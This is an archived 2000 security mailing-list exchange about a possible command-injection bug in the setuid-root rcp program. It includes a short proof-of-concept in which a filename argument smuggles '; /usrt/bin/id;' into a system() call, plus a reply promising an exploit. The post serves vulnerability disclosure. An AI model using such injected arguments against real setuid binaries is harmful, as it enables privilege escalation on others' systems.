SecurityvulnsSECURITYVULNS:DOC:972Re: possible bug in rcp...
On Wed, Nov 22, 2000 at 09:11:20AM +1100, Andrew Griffiths wrote:
> Here is a possible bug in rcp; since I think it calls system(). I
> haven't had much time to play with this, because exama are coming up.
>
> It is negated because system() calls /bin/cp which with the newer
> versions of bash, it drops it's effective credientalsβ¦
>
> $ ls -alF which rcp
> -rwsr-xr-x 1 root root 14492 Jul 21 22:43
> /usr/sbin/rcp
>
> $ cd /tmp
> $ echo bla > bob
> $ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1
> uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
> sh: 127.0.0.1: command not found.
>
> Now doing a quick ltrace - it doesn't remove ; and ` and other fun
> stuff. This could probably be exploited, on older bash bersions?
>
> It's up to you guys/girls now, I should start to studyβ¦
>
> Andrew Griffiths
just a wee exploit to help the boys and girls along innit
tlabs